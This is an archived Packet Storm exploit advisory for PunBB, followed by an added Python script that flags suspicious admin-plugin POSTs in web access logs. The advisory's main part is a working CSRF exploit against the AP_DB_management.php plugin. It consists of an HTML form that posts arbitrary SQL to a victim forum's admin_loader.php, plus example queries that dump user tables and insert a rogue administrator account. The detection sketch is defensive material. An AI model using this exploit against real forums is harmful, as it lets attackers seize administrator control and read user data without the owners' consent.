PunBB AP_DB_management.php SQL Injection

2009-06-29T00:00:00
ID PACKETSTORM:78729
Type packetstorm
Reporter Dante90
Modified 2009-06-29T00:00:00

Description

                                        
`######################################################################################
#
# Author: Dante90, WaRWolFz Crew
# Title: PunBB (AP_DB_management.php) Remote SQL Injection CSRF By Dante90 [0-Day]
# MSN: dante90.dmc4@hotmail.it
# Web: www.warwolfz.org
#
######################################################################################
  
[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90
  
[code]  
  
<html>  
<head>  
<title>[0-Day & Priv8] PunBB Administration Plug-In (AP_DB_management.php) Remote SQL Injection CSRF Exploit By Dante90</title>
</head>  
<body>  
<center><fieldset>  
<legend>Run SQL query</legend>  
<form name="Dante90" method="post" action="http://www.victime_site.org/PunBB/admin_loader.php?plugin=AP_DB_management.php">
<textarea name="this_query" rows="5" cols="50">  
  
[SQL_Injection]  
  
</textarea>  
<input type="submit" name="submit" value="Run query" />  
</form>  
</fieldset></center>  
</body>  
</html>  
  
[/code]  
  
[SQL_Injection] = Insert the SQL Injection  
  
Example of SQL Injection:  
  
[code]  
SELECT * FROM users WHERE id=2;  
  
SELECT * FROM users WHERE group_id=1;  
  
INSERT INTO users (group_id, username, password, email, num_posts,  
registration_ip, last_visit) VALUES(1, '[NICK_NEW_ADMIN]',  
'md5("[PASSWORD_NEW_ADMIN]")', '[E-MAIL_NEW_ADMIN]', 1, '127.0.0.1',  
'1220984516');  
[/code]  
  
[NICK_NEW_ADMIN] = New Administrator's Nick  
  
[PASSWORD_NEW_ADMIN] = New Administrator's Password  
  
[E-MAIL_NEW_ADMIN] = New Administrator's E-Mail  
  
  
Dante90  
`
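
On the defending side, the request that the form above makes an administrator's browser send shows up in the web server's access log as a POST to `admin_loader.php?plugin=AP_DB_management.php` whose Referer is not the forum itself. The following detection sketch is an added example, not part of the original advisory; the combined log format, the hostname `forum.example.org` and all log lines are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: the server writes Apache/nginx "combined" access logs.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'\d{3} \S+ "(?P<referer>[^"]*)" "[^"]*"$'
)
FORUM_HOST = "forum.example.org"  # assumption: the forum's own hostname
PLUGIN = "ap_db_management.php"   # plugin named in the advisory, lowercased


def suspicious_plugin_posts(lines, forum_host=FORUM_HOST):
    """Return (timestamp, ip, reason) for plugin POSTs not sent from the forum."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line.strip())
        if not m or m["method"] != "POST":
            continue
        target = urlsplit(m["target"])
        if not target.path.lower().endswith("/admin_loader.php"):
            continue
        plugins = [p.lower() for p in parse_qs(target.query).get("plugin", [])]
        if PLUGIN not in plugins:
            continue
        referer = m["referer"]
        if referer in ("", "-"):
            reason = "missing Referer"
        else:
            ref_host = (urlsplit(referer).hostname or "").lower()
            if ref_host == forum_host.lower():
                continue  # request came from the forum's own admin page
            reason = "cross-site Referer: " + ref_host
        hits.append((m["ts"], m["ip"], reason))
    return hits


# Constructed sample log lines; with CSRF the client IP is the admin's own browser.
SAMPLE_LOG = [
    '198.51.100.4 - - [29/Jun/2009:10:01:02 +0000] "POST /PunBB/admin_loader.php?plugin=AP_DB_management.php HTTP/1.1" 200 5120 "http://forum.example.org/PunBB/admin_loader.php?plugin=AP_DB_management.php" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jun/2009:10:05:40 +0000] "POST /PunBB/admin_loader.php?plugin=AP_DB_management.php HTTP/1.1" 200 5120 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jun/2009:10:07:11 +0000] "POST /PunBB/admin_loader.php?plugin=AP_DB_management.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jun/2009:10:09:30 +0000] "GET /PunBB/admin_loader.php?plugin=AP_DB_management.php HTTP/1.1" 200 4096 "http://other.example.net/page.html" "Mozilla/5.0"',
    '198.51.100.4 - - [29/Jun/2009:10:12:00 +0000] "POST /PunBB/admin_loader.php?plugin=AP_Other.php HTTP/1.1" 200 900 "http://other.example.net/page.html" "Mozilla/5.0"',
]
if __name__ == "__main__":
    print(suspicious_plugin_posts(SAMPLE_LOG))
```

A missing Referer is a weaker signal than a foreign one, since some clients strip the header, so those hits are leads to review rather than confirmed incidents.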